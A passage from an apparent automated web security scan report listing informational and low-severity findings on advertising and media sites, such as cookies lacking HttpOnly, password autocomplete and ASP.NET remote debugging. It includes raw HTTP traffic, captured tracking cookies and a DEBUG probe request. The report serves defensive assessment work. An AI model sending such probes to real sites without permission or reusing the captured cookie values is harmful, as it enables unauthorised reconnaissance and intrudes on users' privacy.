Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B%00x1642526051; Expires=Mon, 16-Sep-2013 16:30:31 GMT; Path=/
Set-Cookie: rc=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rc=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:30:30 GMT
Content-Length: 85304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript">var NREUM
...[SNIP]...
13.196. http://www.kampyle.com/feedback_form/ff-feedback-form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:57:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGw%3D; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17861
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
13.197. http://www.local.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 16:37:01 GMT
ntCoent-Length: 41856
Server: Microsoft-IIS/7.5
Set-Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; domain=local.com; path=/
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; domain=local.com; expires=Mon, 17-Oct-2011 16:37:02 GMT; path=/
Set-Cookie: localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; domain=local.com; expires=Sat, 17-Sep-2011 17:07:02 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 41856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-us" >
<head><title>Local.com - Search for local businesses,
...[SNIP]...
13.198. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: svid=OPT-OUT; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sat, 17 Sep 2011 17:19:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 17:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>
13.199. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.3264927 HTTP/1.1
Host: www.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sat, 17 Sep 2011 17:19:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 17:19:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Tue, 14-Sep-2021 17:19:15 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>
13.200. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=2.007604E-03 HTTP/1.1
Host: www.nexac.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Thu, 24-Feb-2028 17:18:23 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sat, 17 Sep 2011 17:18:23 GMT
Server: lighttpd/1.4.18

13.201. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /cm/shared/images/logos/hearst-teen-logo-white.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/shared/images/logos/hearst-teen-logo-white.gif?01AD=0 HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=bd71dea-132794851b8-57f14eef-1; original_referrer=http://hearst.com/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 06 Nov 2007 16:58:07 GMT
ETag: "9bf787-51c-43e45897a47de"
Accept-Ranges: bytes
Content-Length: 1308
Content-Type: image/gif
Cache-Control: max-age=86400
Date: Sat, 17 Sep 2011 16:34:52 GMT
Connection: close
Set-Cookie: H1E2=0; expires=Sat, 15-Oct-2011 16:34:52 GMT; path=/; domain=seventeen.com
Set-Cookie: GID=322D1C219DF0E6D2F3B1A74078599756; expires=Sat, 15-Oct-2011 16:34:52 GMT; path=/; domain=seventeen.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a..(....................................................!.......,......(......I..8....`(.di.h..l..p,.tm.x..|....pH,b.....l...t.+,l.l..."...x{.z...Y.. ....r....Cc>k....~.......Wa....    ...m...~..
...[SNIP]...
13.202. http://www2.glam.com/app/site/affiliate/nc/g-optout.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /app/site/affiliate/nc/g-optout.act

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/affiliate/nc/g-optout.act?nocache=0.3544915 HTTP/1.1
Host: www2.glam.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ctags=%3bct%3dxboxk3905; glam_sid=115216131255688937411; etags=ct-Dotomi_4500; edata=ct-Dotomi_4500-220-14

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
p3p: policyref="http://glammedia.com/about_glam/legal/policy.xml",CP="NON DSP COR NID PSAa PSDa OUR IND UNI COM NAV INT STA"
Location: http://www2.glam.com/app/site/affiliate/nc/g-optout-v.act
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 17:18:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:18:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ctags=%3Bct%3Dxboxk3905; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: glam_sid=115216131255688937411; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: etags=ct-Dotomi_4500; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: edata=ct-Dotomi_4500-220-14; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: optout=1; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: optout=1; expires=Thu, 15-Sep-2016 17:18:33 GMT; path=/; domain=.glam.com

14. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET / HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=68
Date: Sat, 17 Sep 2011 16:34:01 GMT
Content-Length: 103172
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
</div>
<form name="login" id="amin" onsubmit="$h.FB.modal.loginForm.submit(); return false;">


<b>
...[SNIP]...
</div>
<input name="password" id="password" type="password" class="password" />

<div id="button" class="right">
...[SNIP]...
15. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tidaltv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tidaltv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 17 Sep 2011 16:46:53 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16. Referer-dependent response  previous  next
There are 14 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://a.collective-media.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /optout

Request 1

GET /optout?na_optout_check=true&rand=793 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: dc=sea; nadp=1; exdp=1; ibvr=1; targ=1; brlg=1; JY57=3mivySL58fBP8iaSfcseWKoGhNUrjbCYu3ek5625JSA8V9hFJXlSU_A; optout=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 17:15:30 GMT
Content-Type: text/html
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0

Request 2

GET /optout?na_optout_check=true&rand=793 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: dc=sea; nadp=1; exdp=1; ibvr=1; targ=1; brlg=1; JY57=3mivySL58fBP8iaSfcseWKoGhNUrjbCYu3ek5625JSA8V9hFJXlSU_A; optout=1

Response 2

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
16.2. http://adnxs.revsci.net/imp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adnxs.revsci.net
Path:   /imp

Request 1

GET /imp?Z=728x90&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:23:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:55 GMT
Content-Length: 404

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.seattlepi.com/&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D937499%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26u%3Dhttp%3A%2F%2Fwww.seattlepi.com%2F"></scr'+'ipt>');

Request 2

GET /imp?Z=728x90&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:17 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:17 GMT
Content-Length: 329

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D937499%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F"></scr'+'ipt>');
16.3. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Request 1

GET /adserver/vdi/762701?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:33:09 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e74cbc5@www.gather.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 16:33:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/762701?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:33:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 16:33:35 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.4. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Request 1

GET /ads/opt-out?op=check&src=NAI&j=&nocache=0.7159083 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
